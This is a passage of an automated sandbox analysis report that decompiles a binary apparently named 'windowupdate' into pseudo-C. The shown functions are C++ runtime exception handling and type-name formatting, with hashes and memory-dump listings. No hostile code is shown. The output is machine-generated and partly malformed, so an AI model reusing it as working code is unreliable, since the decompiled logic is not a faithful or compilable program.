                      								_v24 =  *((intOrPtr*)(E00D4C670(_t266, _t307, _t352, _t353) + 0x1c));
                      								 *((intOrPtr*)(E00D4C670(_t266,  *((intOrPtr*)(E00D4C670(_t266, _t307, _t352, _t353) + 0x1c)), _t352, _t353) + 0x1c)) = 0;
                      								_t254 = E00D4DF20(_t266, _t352, _t353, _a4, _v24);
                      								_t355 = _t355 + 8;
                      								_t309 = _t254 & 0x000000ff;
                      								if((_t254 & 0x000000ff) == 0) {
                      									_t255 = E00D4DFD0(_v24);
                      									_t355 = _t355 + 4;
                      									if((_t255 & 0x000000ff) == 0) {
                      										E00D89BF0(_t309);
                      									} else {
                      										_push(1);
                      										E00D4B0E0(_a4);
                      										_t355 = _t355 + 8;
                      										E00D4D750( &_v136);
                      										E00D4BE10( &_v136, 0xdf3bbc);
                      									}
                      								}
                      							}
                      							goto L27;
                      						}
                      						_t307 = _a4;
                      						if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) != 3) {
                      							L19:
                      							goto L21;
                      						} else {
                      							if( *((intOrPtr*)(_a4 + 0x14)) == 0x19930520) {
                      								L18:
                      								if( *((intOrPtr*)(_a4 + 0x1c)) == 0) {
                      									goto L20;
                      								}
                      								goto L19;
                      							}
                      							_t307 = _a4;
                      							if( *((intOrPtr*)(_a4 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_a4 + 0x14)) == 0x19930522) {
                      								goto L18;
                      							} else {
                      								goto L19;
                      							}
                      						}
                      					}
                      				}
                      				_t267 = _a16;
                      				_t265 = E00D4DF10(_a16, _a20);
                      				_t355 = _t355 + 8;
                      				if(_v12 >= _t265) {
                      					goto L3;
                      				} else {
                      					goto L4;
                      				}
                      			}
                      0x00d4cffa
                      0x00d4d018
                      0x00d4d029
                      0x00d4d037
                      0x00d4d04e
                      0x00d4d059
                      0x00d4d06b
                      0x00d4d070
                      0x00d4d075
                      0x00d4d07d
                      0x00d4d082
                      0x00d4d0ab
                      0x00d4d0b0
                      0x00000000
                      0x00d4d0b0
                      0x00d4d042
                      0x00d4d04b
                      0x00d4d04b
                      0x00d4cff5
                      0x00d4cff5
                      0x00d4d0be
                      0x00d4cf85
                      0x00d4cf88
                      0x00000000
                      0x00d4cf88
                      0x00d4cfb6
                      0x00000000
                      0x00d4d0c3
                      0x00d4cdf1
                      0x00d4cdf1
                      0x00d4cdf8
                      0x00000000
                      0x00000000
                      0x00d4cdfe
                      0x00d4ce07
                      0x00000000
                      0x00000000
                      0x00d4ce16
                      0x00d4ce21
                      0x00d4ce24
                      0x00d4ce2c
                      0x00d4ce71
                      0x00d4ce71
                      0x00d4ce76
                      0x00d4ce7f
                      0x00d4ce89
                      0x00d4ce91
                      0x00d4cea0
                      0x00d4cea5
                      0x00d4cea8
                      0x00d4cead
                      0x00d4ceb5
                      0x00d4ceba
                      0x00d4cec2
                      0x00d4cef0
                      0x00d4cec4
                      0x00d4cec4
                      0x00d4ceca
                      0x00d4cecf
                      0x00d4ced8
                      0x00d4cee9
                      0x00d4cee9
                      0x00d4cec2
                      0x00d4cead
                      0x00000000
                      0x00d4ce7f
                      0x00d4ce2e
                      0x00d4ce37
                      0x00d4ce6f
                      0x00000000
                      0x00d4ce42
                      0x00d4ce4c
                      0x00d4ce66
                      0x00d4ce6d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d4ce6d
                      0x00d4ce4e
                      0x00d4ce58
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d4ce58
                      0x00d4ce37
                      0x00d4cdb6
                      0x00d4cd95
                      0x00d4cd99
                      0x00d4cd9e
                      0x00d4cda4
                      0x00000000
                      0x00d4cda6
                      0x00000000
                      0x00d4cda6

                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4CDFE
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4CE0E
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4CE19
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4CE76
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4CE81
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4CE8C
                      • Is_bad_exception_allowed.LIBVCRUNTIMED ref: 00D4CEB5
                        • Part of subcall function 00D4DFD0: type_info::operator==.LIBVCRUNTIMED ref: 00D4E00D
                      • ___DestructExceptionObject.LIBCMTD ref: 00D4CECA
                      • std::bad_alloc::bad_alloc.LIBCMTD ref: 00D4CED8
                        • Part of subcall function 00D4D750: std::exception::exception.LIBCMTD ref: 00D4D761
                        • Part of subcall function 00D4BE10: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 00D4BEAA
                      • _Smanip.LIBCPMTD ref: 00D4CEFE
                      • __FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 00D4CF88
                      • weak_ptr.LIBCPMTD ref: 00D4CFDF
                      • __FrameHandler3::HandlerMap::end.LIBVCRUNTIMED ref: 00D4CFEB
                      • __FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 00D4CFF5
                      • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00D4D001
                      • CatchIt.LIBCMTD ref: 00D4D0AB
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd$FrameHandlerHandler3::$ExceptionMap::iterator::operator++$Affinity::operator!=CatchConcurrency::details::DestructHardwareIs_bad_exception_allowedMap::endObjectRaiseSmanipstd::bad_alloc::bad_allocstd::exception::exceptiontype_info::operator==weak_ptr
                      • String ID: csm$csm$csm
                      • API String ID: 2995349249-393685449
                      • Opcode ID: 03d46b53caf835541bd45592025745019a04647e925b48f0b108c9ee35340dc2
                      • Instruction ID: 0ca172a7a58183a8644cb7540f7682e4fec0b7d1ae7b51772bc6f7e497175f36
                      • Opcode Fuzzy Hash: 03d46b53caf835541bd45592025745019a04647e925b48f0b108c9ee35340dc2
                      • Instruction Fuzzy Hash: A6F18DB5A11209EFCF18DFA4D881AAE7B76FF58300F148558F9059B252DB30EA45CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D52CD0(signed int _a4, signed int _a8) {
                      				char _v12;
                      				signed int _v13;
                      				signed int _v14;
                      				void* _v15;
                      				void* _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				char _v44;
                      				char _v52;
                      				char _v60;
                      				signed int _v64;
                      				char _v68;
                      				signed int _v72;
                      				char _v76;
                      				signed int _v80;
                      				char _v84;
                      				signed int _v88;
                      				char _v92;
                      				signed int _v96;
                      				char _v100;
                      				signed int _v104;
                      				char _v108;
                      				signed int _v112;
                      				char _v116;
                      				signed int _v120;
                      				char _v124;
                      				signed int _v128;
                      				char _v132;
                      				signed int _v136;
                      				char _v140;
                      				signed int _v144;
                      				char _v148;
                      				signed int _v152;
                      				char _v156;
                      				signed int _v160;
                      				char _v164;
                      				signed int _v168;
                      				char _v172;
                      				signed int _v176;
                      				char _v180;
                      				signed int _v184;
                      				char _v188;
                      				signed int _v192;
                      				char _v196;
                      				signed int _v200;
                      				char _v204;
                      				signed int _v208;
                      				char _v212;
                      				signed int _v216;
                      				char _v220;
                      				signed int _v224;
                      				char _v228;
                      				signed int _v232;
                      				char _v236;
                      				signed int _v240;
                      				char _v244;
                      				signed int _v248;
                      				char _v252;
                      				signed int _v256;
                      				char _v260;
                      				void* _v264;
                      				void* _v268;
                      				intOrPtr _v272;
                      				char _v276;
                      				signed int _v280;
                      				char _v284;
                      				intOrPtr _v288;
                      				char _v292;
                      				signed int _v296;
                      				char _v300;
                      				char _v308;
                      				char _v316;
                      				char _v324;
                      				char _v332;
                      				char _v340;
                      				void* _v348;
                      				char _v356;
                      				signed int _t219;
                      				signed int _t225;
                      				void* _t227;
                      				signed int _t229;
                      				signed int _t232;
                      				char _t236;
                      				char _t239;
                      				char _t243;
                      				signed int _t248;
                      				signed int _t273;
                      				signed int _t309;
                      				signed int _t310;
                      				signed int _t313;
                      				char* _t314;
                      				char* _t315;
                      				signed int _t318;
                      				void* _t321;
                      				void* _t323;
                      
                      				_t219 =  *0xf20640; // 0x0
                      				if( *_t219 == 0) {
                      					E00D4FB00(__eflags, _a4, 1, _a8);
                      					return _a4;
                      				}
                      				_t309 =  *0xf20640; // 0x0
                      				_v15 =  *_t309;
                      				_t273 =  *0xf20640; // 0x0
                      				 *0xf20640 = _t273 + 1;
                      				_t310 = _v15;
                      				_v13 = _t310;
                      				_v14 = 0;
                      				_v20 = 0xffffffff;
                      				E00D4F3F0( &_v12);
                      				_v24 = _v13 & 0x000000ff;
                      				_v24 = _v24 - 0x43;
                      				if(_v24 > 0x1c) {
                      					L35:
                      					_t225 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t225 - 1;
                      					_t227 = E00D54C20(_t310,  &_v324);
                      					_t323 = _t321 + 4;
                      					E00D4F820( &_v12, _t227);
                      					_t229 = E00D5A560( &_v12);
                      					__eflags = _t229;
                      					if(_t229 == 0) {
                      						L37:
                      						if(_v20 != 0xffffffff) {
                      							E00D4F3F0( &_v44);
                      							E00D4F240( &_v60, _a8);
                      							__eflags = _v20 - 0xfffffffe;
                      							if(_v20 != 0xfffffffe) {
                      								_t232 = E00D5A560(_a8);
                      								__eflags = _t232;
                      								if(_t232 != 0) {
                      									__eflags = _v20 & 0x00000001;
                      									if((_v20 & 0x00000001) == 0) {
                      										_t313 = _v20 & 0x00000002;
                      										__eflags = _t313;
                      										if(_t313 != 0) {
                      											_t236 = E00D50060("volatile", 8);
                      											_t323 = _t323 + 8;
                      											_v300 = _t236;
                      											_v296 = _t313;
                      											E00D4F7E0( &_v44,  &_v300);
                      										}
                      									} else {
                      										_t239 = E00D50060("const", 5);
                      										_t323 = _t323 + 8;
                      										_v284 = _t239;
                      										_v280 = _t310;
                      										_t314 =  &_v284;
                      										E00D4F7E0( &_v44, _t314);
                      										__eflags = _v20 & 0x00000002;
                      										if((_v20 & 0x00000002) != 0) {
                      											_t243 = E00D50060(" volatile", 9);
                      											_t323 = _t323 + 8;
                      											_v292 = _t243;
                      											_v288 = _t314;
                      											E00D4FCA0( &_v44,  &_v292);
                      										}
                      									}
                      								}
                      								E00D56A70(_a4,  &_v44,  &_v60);
                      								return _a4;
                      							}
                      							E00D5AA80( &_v60);
                      							_t315 =  &_v60;
                      							E00D56A90( &_v52,  &_v44, _t315);
                      							_t248 = E00D5A520( &_v52);
                      							__eflags = _t248;
                      							if(_t248 == 0) {
                      								_v276 = E00D50060(0xdc8da8, 2);
                      								_v272 = _t315;
                      								E00D4FCA0( &_v52,  &_v276);
                      							}
                      							E00D4F240(_a4,  &_v52);
                      							return _a4;
                      						}
                      						_v28 = _v13 & 0x000000ff;
                      						_v28 = _v28 - 0x43;
                      						if(_v28 > 0x1c) {
                      							L45:
                      							if(E00D5A560(_a8) == 0) {
                      								E00D4FD40( &_v12, E00D4FAD0( &_v356, 0x20, _a8));
                      							}
                      							E00D4F240(_a4,  &_v12);
                      							return _a4;
                      						}
                      						_t318 = _v28;
                      						_t144 = _t318 + 0xd535fc; // 0x498d02
                      						switch( *((intOrPtr*)(( *_t144 & 0x000000ff) * 4 +  &M00D535EC))) {
                      							case 0:
                      								_v260 = E00D50060("signed ", 7);
                      								_v256 = __edx;
                      								__ecx =  &_v12;
                      								__edx =  &_v260;
                      								 &_v340 = E00D4FAA0( &_v340,  &_v260,  &_v12);
                      								__ecx =  &_v12;
                      								__eax = E00D4F820(__ecx, __eax);
                      								goto L45;
                      							case 1:
                      								_v252 = E00D50060("unsigned ", 9);
                      								_v248 = _t318;
                      								_t264 = E00D4FAA0( &_v332,  &_v252,  &_v12);
                      								_t323 = _t323 + 0x14;
                      								E00D4F820( &_v12, _t264);
                      								goto L45;
                      							case 2:
                      								__ecx = _v14 & 0x000000ff;
                      								_v32 = __ecx;
                      								_v32 = _v32 - 0x45;
                      								_v32 = _v32 - 0x45;
                      								__eflags = _v32 - 8;
                      								if(_v32 > 8) {
                      									goto L45;
                      								}
                      								__eax = _v32;
                      								switch( *((intOrPtr*)(_v32 * 4 +  &M00D5361C))) {
                      									case 0:
                      										goto L44;
                      									case 1:
                      										goto L45;
                      								}
                      							case 3:
                      								goto L45;
                      						}
                      					}
                      					E00D4F240(_a4,  &_v12);
                      					return _a4;
                      				}
                      				_t310 = _v24;
                      				_t13 = _t310 + 0xd53528; // 0x498d09
                      				switch( *((intOrPtr*)(( *_t13 & 0x000000ff) * 4 +  &M00D534FC))) {
                      					case 0:
                      						_t269 = E00D50060("char", 4);
                      						_t323 = _t321 + 8;
                      						_v68 = _t269;
                      						_v64 = _t310;
                      						E00D4F7E0( &_v12,  &_v68);
                      						goto L37;
                      					case 1:
                      						_v76 = E00D50060("short", 5);
                      						_v72 = __edx;
                      						__edx =  &_v76;
                      						__ecx =  &_v12;
                      						__eax = E00D4F7E0(__ecx,  &_v76);
                      						goto L37;
                      					case 2:
                      						_v84 = E00D50060("int", 3);
                      						_v80 = __edx;
                      						__eax =  &_v84;
                      						__ecx =  &_v12;
                      						__eax = E00D4F7E0(__ecx,  &_v84);
                      						goto L37;
                      					case 3:
                      						_v92 = E00D50060("long", 4);
                      						_v88 = __edx;
                      						__ecx =  &_v92;
                      						__ecx =  &_v12;
                      						__eax = E00D4F7E0(__ecx,  &_v92);
                      						goto L37;
                      					case 4:
                      						_v100 = E00D50060("float", 5);
                      						_v96 = __edx;
                      						__edx =  &_v100;
                      						__ecx =  &_v12;
                      						__eax = E00D4F7E0(__ecx,  &_v100);
                      						goto L37;
                      					case 5:
                      						L9:
                      						_v116 = E00D50060("double", 6);
                      						_v112 = __edx;
                      						__ecx =  &_v116;
                      						__ecx =  &_v12;
                      						__eax = E00D4FCA0(__ecx,  &_v116);
                      						goto L37;
                      					case 6:
                      						_v108 = E00D50060("long ", 5);
                      						_v104 = __edx;
                      						__eax =  &_v108;
                      						__ecx =  &_v12;
                      						__eax = E00D4F7E0( &_v12,  &_v108);
                      						goto L9;
                      					case 7:
                      						_v13 & 0x000000ff = _v13 & 3;
                      						_v20 = _v13 & 3;
                      						goto L37;
                      					case 8:
                      						_v244 = E00D50060("void", 4);
                      						_v240 = __edx;
                      						__edx =  &_v244;
                      						__ecx =  &_v12;
                      						__eax = E00D4F7E0(__ecx,  &_v244);
                      						goto L37;
                      					case 9:
                      						__eax =  *0xf20640;
                      						_v16 =  *( *0xf20640);
                      						 *0xf20640 =  *0xf20640 + 1;
                      						 *0xf20640 =  *0xf20640 + 1;
                      						_v14 = _v16;
                      						__ecx = _v14 & 0x000000ff;
                      						_v36 = __ecx;
                      						__eflags = _v36 - 0x59;
                      						if(_v36 > 0x59) {
                      							L32:
                      							_v236 = E00D50060("UNKNOWN", 7);
                      							_v232 = __edx;
                      							__ecx =  &_v236;
                      							__ecx =  &_v12;
                      							__eax = E00D4F7E0(__ecx,  &_v236);
                      							L33:
                      							goto L37;
                      						}
                      						__edx = _v36;
                      						__eax =  *(_v36 + 0xd53590) & 0x000000ff;
                      						switch( *((intOrPtr*)(( *(_v36 + 0xd53590) & 0x000000ff) * 4 +  &M00D53548))) {
                      							case 0:
                      								 *0xf20640 =  *0xf20640 - 1;
                      								 *0xf20640 =  *0xf20640 - 1;
                      								__ecx =  &_v12;
                      								__eax = E00D4F920(__ecx, 1);
                      								goto L33;
                      							case 1:
                      								_v228 = E00D50060("__w64 ", 6);
                      								_v224 = __edx;
                      								__edx = _a8;
                      								 &_v316 = E00D52CD0( &_v316, _a8);
                      								__ecx =  &_v228;
                      								__edx = _a4;
                      								__eax = _a4;
                      								return _a4;
                      							case 2:
                      								_v132 = E00D50060("__int8", 6);
                      								_v128 = __edx;
                      								__edx =  &_v132;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v132);
                      								goto L33;
                      							case 3:
                      								_v140 = E00D50060("__int16", 7);
                      								_v136 = __edx;
                      								__eax =  &_v140;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v140);
                      								goto L33;
                      							case 4:
                      								_v148 = E00D50060("__int32", 7);
                      								_v144 = __edx;
                      								__ecx =  &_v148;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v148);
                      								goto L33;
                      							case 5:
                      								_v156 = E00D50060("__int64", 7);
                      								_v152 = __edx;
                      								__edx =  &_v156;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v156);
                      								goto L33;
                      							case 6:
                      								_v164 = E00D50060("__int128", 8);
                      								_v160 = __edx;
                      								__eax =  &_v164;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v164);
                      								goto L33;
                      							case 7:
                      								_v124 = E00D50060("bool", 4);
                      								_v120 = __edx;
                      								__ecx =  &_v124;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v124);
                      								goto L33;
                      							case 8:
                      								_v20 = 0xfffffffe;
                      								goto L33;
                      							case 9:
                      								_v212 = E00D50060("auto", 4);
                      								_v208 = __edx;
                      								__eax =  &_v212;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v212);
                      								goto L33;
                      							case 0xa:
                      								_v180 = E00D50060("char8_t", 7);
                      								_v176 = __edx;
                      								__edx =  &_v180;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v180);
                      								goto L33;
                      							case 0xb:
                      								_v172 = E00D50060("<unknown>", 9);
                      								_v168 = __edx;
                      								__ecx =  &_v172;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v172);
                      								goto L33;
                      							case 0xc:
                      								_v188 = E00D50060("char16_t", 8);
                      								_v184 = __edx;
                      								__eax =  &_v188;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v188);
                      								goto L33;
                      							case 0xd:
                      								_v220 = E00D50060("decltype(auto)", 0xe);
                      								_v216 = __edx;
                      								__ecx =  &_v220;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v220);
                      								goto L33;
                      							case 0xe:
                      								_v196 = E00D50060("char32_t", 8);
                      								_v192 = __edx;
                      								__ecx =  &_v196;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v196);
                      								goto L33;
                      							case 0xf:
                      								_v204 = E00D50060("wchar_t", 7);
                      								_v200 = __edx;
                      								__edx =  &_v204;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0(__ecx,  &_v204);
                      								goto L33;
                      							case 0x10:
                      								__edx =  *0xf20640;
                      								__edx =  *0xf20640 - 1;
                      								 *0xf20640 = __edx;
                      								 &_v308 = E00D54C20(__edx,  &_v308);
                      								__ecx =  &_v12;
                      								__eax = E00D4F820( &_v12, __eax);
                      								__ecx =  &_v12;
                      								__eax = E00D5A560(__ecx);
                      								__eflags = __eax;
                      								if(__eax != 0) {
                      									__ecx =  &_v12;
                      									__ecx = _a4;
                      									E00D4F240(_a4,  &_v12) = _a4;
                      									return _a4;
                      								}
                      								goto L33;
                      							case 0x11:
                      								goto L32;
                      						}
                      					case 0xa:
                      						goto L35;
                      				}
                      			}






































































































                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$operator+$EmptyName::is$Iterator_baseIterator_base::_std::_
                      • String ID: volatile$char$const$double$float$int$long$long $short$signed $unsigned $volatile
                      • API String ID: 2623725463-1006727529
                      • Opcode ID: 19743a18666f6b2466705cf87ab354e6770ad3d5f6043504e7d85ff15321c163
                      • Instruction ID: bd93d0bb1f16842e1405841eb3fe55d94edf70b8a6727ecea98b06371fb1fca1
                      • Opcode Fuzzy Hash: 19743a18666f6b2466705cf87ab354e6770ad3d5f6043504e7d85ff15321c163
                      • Instruction Fuzzy Hash: 51D14DB6C00219AFCF15DF94DC52AEEBB74AF54301F04416AE91A6A292EB705748CFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 99%
                      			E00D55E80(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
                      				char _v12;
                      				signed int _v13;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				char _v36;
                      				char _v44;
                      				intOrPtr _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				char _v68;
                      				char _v76;
                      				intOrPtr _v80;
                      				signed int _v84;
                      				signed int _v88;
                      				signed int _v92;
                      				signed int _v96;
                      				signed int _v100;
                      				signed int _v104;
                      				signed int _v108;
                      				signed int _v112;
                      				signed int _v116;
                      				signed int _v120;
                      				signed int _v124;
                      				signed int _v128;
                      				char _v136;
                      				char _v144;
                      				char _v152;
                      				signed int _v156;
                      				char _v160;
                      				char _v168;
                      				signed int _v172;
                      				char _v176;
                      				char _v184;
                      				char _v192;
                      				char _v200;
                      				char _v208;
                      				char _v216;
                      				char _v224;
                      				char _v232;
                      				char _v240;
                      				char _v248;
                      				char _v256;
                      				char _v264;
                      				char _v272;
                      				char _v280;
                      				char _v288;
                      				char _v296;
                      				char _v304;
                      				char _v312;
                      				char _v320;
                      				char _v328;
                      				signed int _t256;
                      				signed int _t271;
                      
                      				E00D4F3F0( &_v12);
                      				E00D4F3F0( &_v36);
                      				_v60 = 0;
                      				_v20 = 0;
                      				_t256 =  *0xf20640; // 0x0
                      				_v80 =  *_t256;
                      				_t271 =  *0xf20640; // 0x0
                      				 *0xf20640 = _t271 + 1;
                      				_v48 = _v80;
                      				if(_v48 > 0x5f) {
                      					L73:
                      					E00D4F350(_a4, 2);
                      					return _a4;
                      				}
                      				_t10 = _v48 + 0xd56840; // 0xd560c905
                      				switch( *((intOrPtr*)(( *_t10 & 0x000000ff) * 4 +  &M00D56824))) {
                      					case 0:
                      						 *0xf20640 =  *0xf20640 - 1;
                      						E00D4F350(_a4, 1);
                      						return _a4;
                      					case 1:
                      						_t15 =  &_v44; // -39
                      						__ecx = _t15;
                      						__eax = E00D4F3F0(_t15);
                      						__ecx = _a8 & 0x000000ff;
                      						__eflags = _a8 & 0x000000ff;
                      						if(__eflags == 0) {
                      							L11:
                      							__ecx =  *0xf20640; // 0x0
                      							_v84 = __ecx;
                      							_t29 =  &_v208; // -203
                      							__edx = _t29;
                      							__eax = E00D5A1E0(__ebx, __edi, __esi, _t29, 0, 0);
                      							_t30 =  &_v12; // -7
                      							__ecx = _t30;
                      							__eax = _v84;
                      							 *0xf20640 = _v84;
                      							_t32 =  &_v12; // -7
                      							__ecx = _t32;
                      							__eax = E00D5A560(_t32);
                      							__eflags = __eax;
                      							if(__eax == 0) {
                      								__ecx = 1;
                      								__edx = 0xffffffffffffffff;
                      								__eax =  *0xf20640; // 0x0
                      								__ecx =  *(__eax + 0xffffffffffffffff);
                      								__eflags =  *(__eax + 0xffffffffffffffff) - 0x31;
                      								if( *(__eax + 0xffffffffffffffff) == 0x31) {
                      									_t34 =  &_v12; // -7
                      									__edx = _t34;
                      									_t35 =  &_v216; // -211
                      									_t35 = E00D4FAD0(_t35, 0x7e, _t34);
                      									_t36 =  &_v12; // -7
                      									__ecx = _t36;
                      									__eax = E00D4F820(_t36, __eax);
                      								}
                      							}
                      							_t37 =  &_v44; // -39
                      							__ecx = _t37;
                      							__eax = E00D5A560(_t37);
                      							__eflags = __eax;
                      							if(__eax == 0) {
                      								_t38 =  &_v44; // -39
                      								__ecx = _t38;
                      								_t39 =  &_v12; // -7
                      								__ecx = _t39;
                      								__eax = E00D4FD40(_t39, _t38);
                      							}
                      							_t40 =  &_v12; // -7
                      							__edx = _t40;
                      							__ecx = _a4;
                      							E00D4F240(_a4, _t40) = _a4;
                      							return _a4;
                      						}
                      						_t17 =  &_v192; // -187
                      						__edx = _t17;
                      						__eax = E00D58210(__ebx, __edi, __esi, __eflags, _t17);
                      						_t18 =  &_v200; // -195
                      						_t18 = E00D4FAD0(_t18, 0x3c, _t18);
                      						_t19 =  &_v44; // -39
                      						__ecx = _t19;
                      						__eax = E00D4FD40(_t19, __eax);
                      						_t20 =  &_v44; // -39
                      						__ecx = _t20;
                      						__eax = E00D55990(_t20);
                      						__ecx = __al;
                      						__eflags = __al - 0x3e;
                      						if(__al == 0x3e) {
                      							_t21 =  &_v44; // -39
                      							__ecx = _t21;
                      							__eax = E00D4FDE0(_t21, 0x20);
                      						}
                      						_t22 =  &_v44; // -39
                      						__ecx = _t22;
                      						__eax = E00D4FDE0(_t22, 0x3e);
                      						__eflags = _a12;
                      						if(_a12 != 0) {
                      							__edx = _a12;
                      							 *_a12 = 1;
                      						}
                      						__eax =  *0xf20640; // 0x0
                      						__ecx =  *__eax;
                      						__eflags =  *__eax;
                      						if( *__eax != 0) {
                      							__eax =  *0xf20640; // 0x0
                      							__eax = __eax + 1;
                      							__eflags = __eax;
                      							 *0xf20640 = __eax;
                      							goto L11;
                      						} else {
                      							_t25 =  &_v44; // -39
                      							__edx = _t25;
                      							__ecx = _a4;
                      							E00D4F240(_a4, _t25) = _a4;
                      							return _a4;
                      						}
                      					case 2:
                      						__eax = 1;
                      						__ecx = 0xffffffffffffffff;
                      						__edx =  *0xf20640; // 0x0
                      						__eax =  *(__edx + 0xffffffffffffffff);
                      						__ecx =  *(__edx + 0xffffffffffffffff) * 8 +  &M00DC8838;
                      						_t46 =  &_v12; // -7
                      						__ecx = _t46;
                      						__eax = E00D4F7E0(_t46,  *(__edx + 0xffffffffffffffff) * 8 +  &M00DC8838);
                      						goto L74;
                      					case 3:
                      						L19:
                      						__edx = 1;
                      						__eax = 0xffffffffffffffff;
                      						__ecx =  *0xf20640; // 0x0
                      						__edx =  *(_t51 + 0xffffffffffffffff);
                      						__eax =  *(_t51 + 0xffffffffffffffff) * 8 +  &M00DC8800;
                      						_t51 =  &_v12; // -7
                      						__ecx = _t51;
                      						__eax = E00D4F7E0(_t51,  *(_t51 + 0xffffffffffffffff) * 8 +  &M00DC8800);
                      						goto L74;
                      					case 4:
                      						_v60 = 1;
                      						goto L19;
                      					case 5:
                      						__ecx =  *0xf20640;
                      						__edx =  *( *0xf20640);
                      						_v88 =  *( *0xf20640);
                      						__eax =  *0xf20640; // 0x0
                      						 *0xf20640 = __eax;
                      						__ecx = _v88;
                      						_v52 = _v88;
                      						__eflags = _v52 - 0x5f;
                      						if(_v52 > 0x5f) {
                      							L71:
                      							__ecx = _a4;
                      							E00D4F350(_a4, 2) = _a4;
                      							return _a4;
                      						}
                      						__edx = _v52;
                      						__eax =  *(_v52 + 0xd568d4) & 0x000000ff;
                      						switch( *((intOrPtr*)(( *(_v52 + 0xd568d4) & 0x000000ff) * 4 +  &M00D568A0))) {
                      							case 0:
                      								 *0xf20640 =  *0xf20640 - 1;
                      								 *0xf20640 =  *0xf20640 - 1;
                      								__ecx = _a4;
                      								E00D4F350(_a4, 1) = _a4;
                      								return _a4;
                      							case 1:
                      								__edx = 1;
                      								__eax = 0xffffffffffffffff;
                      								__ecx =  *0xf20640; // 0x0
                      								__edx =  *(_t65 + 0xffffffffffffffff);
                      								__eax = 0xdc8958 +  *(_t65 + 0xffffffffffffffff) * 8;
                      								_t65 =  &_v12; // -7
                      								__ecx = _t65;
                      								__eax = E00D4F7E0(_t65, 0xdc8958 +  *(_t65 + 0xffffffffffffffff) * 8);
                      								goto L72;
                      							case 2:
                      								__ecx = 1;
                      								__edx = 0xffffffffffffffff;
                      								__eax =  *0xf20640; // 0x0
                      								__ecx =  *(__eax + 0xffffffffffffffff);
                      								__edx = 0xdc8958 +  *(__eax + 0xffffffffffffffff) * 8;
                      								__ecx = _a4;
                      								__eax = _a4;
                      								return _a4;
                      							case 3:
                      								__eax = 1;
